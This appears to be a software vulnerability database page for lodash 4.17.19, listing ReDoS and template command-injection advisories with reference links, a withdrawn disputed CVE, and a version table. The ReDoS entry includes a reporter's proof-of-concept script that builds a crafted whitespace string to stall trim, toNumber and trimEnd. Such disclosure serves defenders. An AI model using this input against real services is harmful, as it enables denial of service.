NodeJS/lodash/4.17.19
Lodash modular utilities.
https://www.npmjs.com/package/lodash
MIT
3 Security Vulnerabilities
Regular Expression Denial of Service (ReDoS) in lodash
- https://nvd.nist.gov/vuln/detail/CVE-2020-28500
- https://github.com/lodash/lodash/pull/5065
- https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
- https://github.com/lodash/lodash/blob/npm/trimEnd.js#L8
- https://security.netapp.com/advisory/ntap-20210312-0006/
- https://snyk.io/vuln/SNYK-JS-LODASH-1018905
- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://github.com/advisories/GHSA-29mw-wpgm-hmr9
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.
Steps to reproduce (provided by reporter Liyuan Chen):

```js
var lo = require('lodash');

// Build a string of the form "1" + n spaces + "1". The long run of
// whitespace that is followed by a non-whitespace character is what makes
// the affected regular expressions backtrack excessively.
function build_blank(n) {
  var ret = "1";
  for (var i = 0; i < n; i++) {
    ret += " ";
  }
  return ret + "1";
}

var s = build_blank(50000);

// Time each affected function on the crafted input (milliseconds).
var time0 = Date.now();
lo.trim(s);
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);

var time1 = Date.now();
lo.toNumber(s);
var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);

var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
```
Command Injection in lodash
- https://nvd.nist.gov/vuln/detail/CVE-2021-23337
- https://github.com/advisories/GHSA-35jh-r3h4-6jhm
- https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
- https://security.netapp.com/advisory/ntap-20210312-0006/
- https://snyk.io/vuln/SNYK-JS-LODASH-1040724
- https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851
- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- https://security.netapp.com/advisory/ntap-20210312-0006
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Withdrawn: Arbitrary code execution in lodash
Withdrawn
GitHub has chosen to publish this CVE as a withdrawn advisory due to it not being a security issue. See this issue for more details.
CVE description
"** DISPUTED ** A command injection vulnerability in Lodash 4.17.21 allows attackers to achieve arbitrary code execution via the template function. This is a different parameter, method, and version than CVE-2021-23337. NOTE: the vendor's position is that it's the developer's responsibility to ensure that a template does not evaluate code that originates from untrusted input."
114 Other Versions
Version | License | Security | Released | Age |
---|---|---|---|---|
0.5.2 | MIT | 9 | 2012-08-22 - 16:22 | over 11 years |
0.5.1 | MIT | 9 | 2012-08-18 - 20:15 | over 11 years |
0.5.0 | MIT | 9 | 2012-08-17 - 20:13 | over 11 years |
0.5.0-rc.1 | MIT | 9 | 2012-08-07 - 15:08 | almost 12 years |
0.4.2 | MIT | 9 | 2012-07-16 - 18:49 | almost 12 years |
0.4.1 | MIT | 9 | 2012-07-12 - 04:56 | almost 12 years |
0.4.0 | MIT | 9 | 2012-07-11 - 17:14 | almost 12 years |
0.3.2 | MIT | 9 | 2012-06-14 - 19:19 | almost 12 years |
0.3.1 | MIT | 9 | 2012-06-11 - 04:12 | almost 12 years |
0.3.0 | MIT | 9 | 2012-06-06 - 20:01 | almost 12 years |
0.2.2 | MIT | 9 | 2012-05-30 - 07:56 | almost 12 years |
0.2.1 | MIT | 9 | 2012-05-24 - 21:53 | almost 12 years |
0.2.0 | MIT | 9 | 2012-05-22 - 04:06 | almost 12 years |
0.1.0 | MIT | 9 | 2012-04-23 - 16:37 | about 12 years |